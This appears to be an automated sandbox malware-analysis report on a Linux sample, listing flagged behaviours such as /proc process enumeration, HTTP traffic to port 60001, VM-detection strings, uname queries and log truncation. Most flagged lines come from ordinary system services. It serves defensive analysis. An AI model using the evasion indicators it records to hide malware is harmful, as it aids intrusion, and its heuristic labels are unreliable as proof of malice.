Source: /bin/sh (PID: 5942) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5944) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5950) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5952) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Reads system information from the proc file system
Source: /lib/systemd/systemd-journald (PID: 5321) Reads from proc file: /proc/meminfo
Source: /lib/systemd/systemd-journald (PID: 5566) Reads from proc file: /proc/meminfo
Source: /lib/systemd/systemd-journald (PID: 5668) Reads from proc file: /proc/meminfo
Source: /lib/systemd/systemd-journald (PID: 5746) Reads from proc file: /proc/meminfo
Source: /lib/systemd/systemd-journald (PID: 5850) Reads from proc file: /proc/meminfo
Source: /lib/systemd/systemd-journald (PID: 5925) Reads from proc file: /proc/meminfo
Source: /lib/systemd/systemd-journald (PID: 6033) Reads from proc file: /proc/meminfo
Enumerates processes within the "proc" file system
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/491/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/793/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/772/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/796/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/774/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/797/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/777/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/799/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/658/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/912/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/759/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/936/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/918/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/1/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/761/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/785/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/884/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/720/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/721/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/788/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/789/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/800/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/801/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/847/fd
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/904/fd
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6021/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6021/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6021/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6021/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6021/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6021/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6021/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6033/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6033/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6033/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6033/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6033/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6033/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6024/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6024/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6024/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6024/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6024/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6024/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6024/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6046/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6046/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6046/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6046/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6046/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6046/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6046/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6049/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6049/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6049/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6049/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6049/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6049/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6049/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5961/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5961/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5961/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5961/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5961/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5961/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5961/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6041/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6041/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6041/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6041/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6041/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6041/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6041/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5948/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5948/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5948/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5948/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5948/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5948/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5948/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/environ
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/sched
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/cgroup
Executes the "systemctl" command used for controlling the systemd system and service manager
Source: /usr/sbin/invoke-rc.d (PID: 5238) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-enabled cups.service
Source: /usr/sbin/invoke-rc.d (PID: 5243) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active cups.service
Source: /usr/lib/rsyslog/rsyslog-rotate (PID: 5247) Systemctl executable: /usr/bin/systemctl -> systemctl kill -s HUP rsyslog.service
Creates hidden files and/or directories
Source: /usr/bin/whoopsie (PID: 5383) Directory: /nonexistent/.cache
Source: /usr/lib/policykit-1/polkitd (PID: 5454) Directory: /root/.cache
Source: /usr/lib/gdm3/gdm-wayland-session (PID: 5525) Directory: /var/lib/gdm3/.cache
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5504) Directory: /root/.cache
Source: /usr/bin/whoopsie (PID: 5567) Directory: /nonexistent/.cache
Source: /usr/bin/whoopsie (PID: 5669) Directory: /nonexistent/.cache
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5744) Directory: /root/.cache
Source: /usr/bin/whoopsie (PID: 5750) Directory: /nonexistent/.cache
Source: /usr/bin/whoopsie (PID: 5852) Directory: /nonexistent/.cache
Source: /usr/bin/whoopsie (PID: 5929) Directory: /nonexistent/.cache
Source: /usr/lib/policykit-1/polkitd (PID: 6024) Directory: /root/.cache
Source: /usr/bin/whoopsie (PID: 6029) Directory: /nonexistent/.cache
Source: /usr/bin/whoopsie (PID: 6049) Directory: /nonexistent/.cache
Sample tries to set the executable flag
Source: /usr/sbin/gdm3 (PID: 5498) File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)
Source: /usr/sbin/gdm3 (PID: 5498) File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5504) File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5504) File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)
Source: /usr/sbin/gdm3 (PID: 5697) File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)
Source: /usr/sbin/gdm3 (PID: 5697) File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5744) File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5744) File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)
Executes commands using a shell command-line interpreter
Source: /usr/sbin/logrotate (PID: 5234) Shell command executed: sh -c "\n\t\tinvoke-rc.d --quiet cups restart > /dev/null\n" logrotate_script "/var/log/cups/*log "
Source: /usr/sbin/logrotate (PID: 5245) Shell command executed: sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslog
Source: /usr/bin/gpu-manager (PID: 5471) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5473) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5475) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5477) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5479) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5482) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5484) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5488) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/share/language-tools/language-options (PID: 5516) Shell command executed: sh -c "locale -a | grep -F .utf8 "
Source: /usr/bin/gpu-manager (PID: 5634) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5636) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5639) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5641) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5643) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5645) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5650) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5654) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/share/language-tools/language-options (PID: 5753) Shell command executed: sh -c "locale -a | grep -F .utf8 "
Source: /usr/bin/gpu-manager (PID: 5820) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5822) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5824) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5827) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5830) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5832) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5837) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5839) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5927) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5930) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5934) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5936) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5940) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5943) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5949) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5951) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/sbin/rsyslogd (PID: 5459) Log file created: /var/log/auth.log
Source: /usr/sbin/rsyslogd (PID: 5459) Log file created: /var/log/kern.log
Source: /usr/bin/gpu-manager (PID: 5470) Log file created: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 5633) Log file created: /var/log/gpu-manager.log
Source: /usr/sbin/rsyslogd (PID: 5653) Log file created: /var/log/auth.log
Source: /usr/sbin/rsyslogd (PID: 5653) Log file created: /var/log/kern.log
Source: /usr/sbin/rsyslogd (PID: 5734) Log file created: /var/log/kern.log
Source: /usr/bin/gpu-manager (PID: 5762) Log file created: /var/log/gpu-manager.log
Source: /usr/sbin/rsyslogd (PID: 5843) Log file created: /var/log/auth.log
Source: /usr/sbin/rsyslogd (PID: 5843) Log file created: /var/log/kern.log
Source: /usr/sbin/rsyslogd (PID: 5917) Log file created: /var/log/kern.log
Source: /usr/sbin/rsyslogd (PID: 5917) Log file created: /var/log/auth.log
Source: /usr/bin/gpu-manager (PID: 5926) Log file created: /var/log/gpu-manager.log
Source: /usr/sbin/rsyslogd (PID: 6021) Log file created: /var/log/auth.log
Source: /usr/sbin/rsyslogd (PID: 6021) Log file created: /var/log/kern.log

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 35978 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 37668 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52794 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 50466 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39302 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53846 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43140 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43564 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 32850 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33276 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 37456 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 51214 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 51618 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43354 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 56348 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35656 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58528 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35206 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48776 -> 60001

Malware Analysis System Evasion:

Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pulseaudio (PID: 5386) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5492) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5661) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5842) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5948) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6019) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 6041) Reads CPU info from /sys: /sys/devices/system/cpu/online
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /usr/bin/find (PID: 5232) Queries kernel information via 'uname':
Source: /tmp/nSg5RM0w0d (PID: 5278) Queries kernel information via 'uname':
Source: /lib/systemd/systemd-journald (PID: 5321) Queries kernel information via 'uname':
Source: /usr/bin/whoopsie (PID: 5383) Queries kernel information via 'uname':
Source: /usr/bin/pulseaudio (PID: 5386) Queries kernel information via 'uname':
Source: /usr/sbin/rsyslogd (PID: 5459) Queries kernel information via 'uname':
Source: /sbin/agetty (PID: 5461) Queries kernel information via 'uname':
Source: /usr/bin/gpu-manager (PID: 5470) Queries kernel information via 'uname':
Source: /usr/lib/gdm3/gdm-session-worker (PID: 5521) Queries kernel information via 'uname':
Source: /lib/systemd/systemd-journald (PID: 5566) Queries kernel information via 'uname':
Source: /usr/bin/whoopsie (PID: 5567) Queries kernel information via 'uname':
Source: /usr/bin/gpu-manager (PID: 5633) Queries kernel information via 'uname':
Source: /usr/sbin/rsyslogd (PID: 5653) Queries kernel information via 'uname':
Source: /sbin/agetty (PID: 5659) Queries kernel information via 'uname':
Source: /lib/systemd/systemd-journald (PID: 5668) Queries kernel information via 'uname':
Source: /usr/bin/whoopsie (PID: 5669) Queries kernel information via 'uname':
Source: /usr/sbin/rsyslogd (PID: 5734) Queries kernel information via 'uname':
Source: /sbin/agetty (PID: 5740) Queries kernel information via 'uname':
Source: /lib/systemd/systemd-journald (PID: 5746) Queries kernel information via 'uname':
Source: /usr/bin/whoopsie (PID: 5750) Queries kernel information via 'uname':
Source: /usr/bin/gpu-manager (PID: 5762) Queries kernel information via 'uname':
Source: /usr/sbin/rsyslogd (PID: 5843) Queries kernel information via 'uname':
Source: /lib/systemd/systemd-journald (PID: 5850) Queries kernel information via 'uname':
Source: /usr/bin/whoopsie (PID: 5852) Queries kernel information via 'uname':
Source: /usr/sbin/rsyslogd (PID: 5917) Queries kernel information via 'uname':
Source: /sbin/agetty (PID: 5924) Queries kernel information via 'uname':
Source: /lib/systemd/systemd-journald (PID: 5925) Queries kernel information via 'uname':
Source: /usr/bin/gpu-manager (PID: 5926) Queries kernel information via 'uname':
Source: /usr/bin/whoopsie (PID: 5929) Queries kernel information via 'uname':
Source: /usr/bin/pulseaudio (PID: 5948) Queries kernel information via 'uname':
Source: /usr/sbin/rsyslogd (PID: 6021) Queries kernel information via 'uname':
Source: /sbin/agetty (PID: 6025) Queries kernel information via 'uname':
Source: /usr/bin/whoopsie (PID: 6029) Queries kernel information via 'uname':
Source: /lib/systemd/systemd-journald (PID: 6033) Queries kernel information via 'uname':
Source: /usr/bin/pulseaudio (PID: 6041) Queries kernel information via 'uname':
Deletes log files
Source: /usr/sbin/logrotate (PID: 5192) Truncated file: /var/log/cups/access_log.1
Source: /usr/sbin/logrotate (PID: 5192) Truncated file: /var/log/syslog.1
Source: /usr/bin/gpu-manager (PID: 5470) Truncated file: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 5633) Truncated file: /var/log/gpu-manager.log
Source: /lib/systemd/systemd-journald (PID: 5746) Truncated file: /var/log/journal/ee49dfd4fa47433baee88884e2d7de7c/system@0005d593c8771680-635fa3b935fc1b52.journal~
Source: /usr/bin/gpu-manager (PID: 5762) Truncated file: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 5926) Truncated file: /var/log/gpu-manager.log
Source: 5237.18.dr Binary or memory string: -9915837702310A--gzvmware kernel module
Source: 5237.18.dr Binary or memory string: -1116261022170A--gzQEMU User Emulator
Source: 5237.18.dr Binary or memory string: qemu-or1k
Source: 5237.18.dr Binary or memory string: qemu-riscv64
Source: 5237.18.dr Binary or memory string: {cqemu
Source: 5237.18.dr Binary or memory string: qemu-arm
Source: 5237.18.dr Binary or memory string: (qemu
Source: 5237.18.dr Binary or memory string: qemu-tilegx
Source: 5237.18.dr Binary or memory string: qemu-hppa
Source: 5237.18.dr Binary or memory string: q{rqemu%
Source: 5237.18.dr Binary or memory string: )qemu
Source: 5237.18.dr Binary or memory string: vmware-toolbox-cmd
Source: 5237.18.dr Binary or memory string: qemu-ppc
Source: 5237.18.dr Binary or memory string: Tqemu9
Source: nSg5RM0w0d, 5278.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5281.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5282.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5286.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5289.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5290.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5294.1.00000000e75c9218.00000000d9b03796.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/m68k
Source: nSg5RM0w0d, 5278.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5281.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5282.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5286.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5289.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5290.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, 5294.1.00000000e75c9218.00000000d9b03796.rw-.sdmp Binary or memory string: kaU!/etc/qemu-binfmt/m68k
Source: syslog.67.dr Binary or memory string: Jan 15 00:11:43 galassia kernel: [ 478.955182] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 12/12/2018
Source: 5237.18.dr Binary or memory string: qemu-aarch64_be
Source: 5237.18.dr Binary or memory string: 0qemu9
Source: 5237.18.dr Binary or memory string: qemu-sparc64
Source: 5237.18.dr Binary or memory string: qemu-mips64
Source: 5237.18.dr Binary or memory string: vV:qemu9
Source: 5237.18.dr Binary or memory string: qemu-ppc64le
Source: 5237.18.dr Binary or memory string: <glib::param::uint64Glib::Param::UInt643pm315820097650A--gzWrapper for uint64 parameters in GLibx86_64-linux-gnu-ld.gold-1116112426130B--gzThe GNU ELF linkerprinter-profile-1115804162510A--gzProfile using X-Rite ColorMunki and Argyll CMSgrub-fstest-1116214898500A--gzdebug tool for GRUB filesystem driversxdg-user-dir-1115483406210A--gzFind an XDG user dirkmodsign-1115569251480A--gzKernel module signing toolsensible-editor-1115739932820A--gzsensible editing, paging, and web browsingminesMines6615854478170Cgnome-mines-gzinputattach-1115708189280A--gzattach a serial line to an input-layer devicegapplication-1116155671180A--gzD-Bus application launcherip-tunnel-8815816145190A--gztunnel configurationkoi8rxterm-1116140167530A--gzX terminal emulator for KOI8-R environmentsfoo2hiperc-wrapper-1115804162510A-tgzConvert Postscript into a HIPERC printer streamcryptsetup-reencrypt-8816002888050A--gztool for offline LUKS device re-encryptionsyndaemon-1115861716810A--gza program that monitors keyboard activity and disables the touchpad when the keyboard is being used.gslj-1115980290200B--gzFormat and print text for LaserJet printer using ghostscriptfile2brl-1115757179490A--gzTranslate an xml or a text file into an embosser-ready braille filexfdesktop-settings-1115793419820A--gzDesktop settings for Xfceua-1115856013570B--gzManage Ubuntu Advantage services from Canonicallatin4-7715812813670B--gzISO 8859-4 character set encoded in octal, decimal, and hexadecimalsane-genesys-5516003468200A--gzSANE backend for GL646, GL841, GL843, GL847 and GL124 based USB flatbed scannerspdftohtml-1115853266670A--gzprogram to convert PDF files into HTML, XML and PNG imagesbluetooth-sendto-1116015653360A--gzGTK application for transferring files over Bluetoothqemu-ppc64-1116261022170B--gzQEMU User Emulatorcache_metadata_size-8815811608350A--gzEstimate the size of the metadata device needed for a given 
